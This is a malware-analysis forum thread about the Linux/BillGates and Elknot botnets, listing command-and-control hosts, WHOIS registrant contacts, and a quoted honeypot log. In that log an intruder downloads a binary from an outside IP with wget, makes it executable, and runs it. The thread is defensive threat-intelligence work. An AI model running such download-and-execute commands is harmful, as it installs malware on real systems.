Linux/BillGates

Forum for analysis and discussion about malware.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Wed Sep 16, 2015 5:26 am

Thank you for your report on Linux/BillGates repository. Allow me to correct your analysis as per below:
sysopfb wrote:xdwl appears to be a upx packed version of BillGates.Lite that you wrote about on MMD?
1. xdwl is the Elknot packed & stripped version, not BillGates.Lite, cnc data is fine.
2. xdsy is the BillGates with the CNC as hostname basis (linux.xinhuamei.net) the CNC is opening port number: 12345

Code: Select all

;; QUESTION SECTION:
;linux.xinhuamei.net.           IN      A
;; ANSWER SECTION:
linux.xinhuamei.net.    120     IN      A       61.160.194.62
Additionally, kindly share the panel screenshot for other experts to evaluate the infection pace is recommendable if you are willing to share it. Since this repository reports are used by some admins, abuse or authority for cleanup or evidence reference.
Image
Due to the native of the cnc info. We can not say it is the hacked domains or ddns service, below is the responsible contact for this infection:

Code: Select all

Domain name: xinhuamei.net
Registry Domain ID: 1918918222_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.bizcn.com
Registrar URL: http://www.bizcn.com
Updated Date: 2015-04-12T04:19:45Z
Creation Date: 2015-04-12T04:19:44Z
Registrar Registration Expiration Date: 2016-04-12T04:19:44Z
Registrar: Bizcn.com,Inc.
Registrar IANA ID: 471
Registrar Abuse Contact Email: abuse@bizcn.com
Registrar Abuse Contact Phone: +86.5922577888
Domain Status: clientDeleteProhibited (http://www.icann.org/epp#clientDeleteProhibited)
Domain Status: clientTransferProhibited (http://www.icann.org/epp#clientTransferProhibited)
Registry Registrant ID:
Registrant Name: Xiao Dan
Registrant Organization: Xiao Dan
Registrant Street: Henan Zhengzhou 887
Registrant City: ZhengZhou
Registrant State/Province: HeNan
Registrant Postal Code: 123456
Registrant Country: CN
Registrant Phone: +86.8731650734
Registrant Phone Ext:
Registrant Fax: +86.8731650734
Registrant Fax Ext:
Registrant Email: 664035800@qq.com
Image
No matter how good we reverse, no PCAP = no case, so here it is:
Image
#MalwareMustDie
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Sat Sep 19, 2015 8:59 am

An infection effort from 60.166.61.110

Code: Select all

2015-09-18 10:35:54 [session=78,ip=60.166.61.110] wget -O /tmp/Kinwu.exe http://183.60.216.182:88/Kinwu.exe
2015-09-18 10:35:59 [session=78,ip=60.166.61.110] chmod 0755 /tmp/Kinwu.exe
2015-09-18 10:36:04 [session=78,ip=60.166.61.110] nohup /tmp/Kinwu.exe > /dev/null 2>&1 &
2015-09-18 10:36:09 [session=78,ip=60.166.61.110] /tmp/Kinwu.exe
2015-09-18 10:36:14 [session=78,ip=60.166.61.110] ./Kinwu.exe &
Image
VT: https://www.virustotal.com/en/file/e43e ... /analysis/
Buggy caused from bad packer setting :lol:

Code: Select all

$ ./Kinwu.exe
Segmentation fault
It looks like a bad packer setting is making a packed ELF made -
a stupid call to 0x080626da (way out of bound) which is causing SEGFAULT.
Patch the ELF or reverse it well to get the below CNC, or use "that" way.

Code: Select all

mjg.f3322.org (222.186.34.220) port: 65535
I love when those crooks got sloppy :P
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Tue Oct 13, 2015 2:52 pm

Panel and CNC in 180.97.215.131, CNC is on a setup domain 51sf176.com registered by 1043898868@qq.com
Details: http://imgur.com/a/7LcuS
Sample: https://www.virustotal.com/en/file/9c8e ... 444746052/
You do not have the required permissions to view the files attached to this post.
Post Reply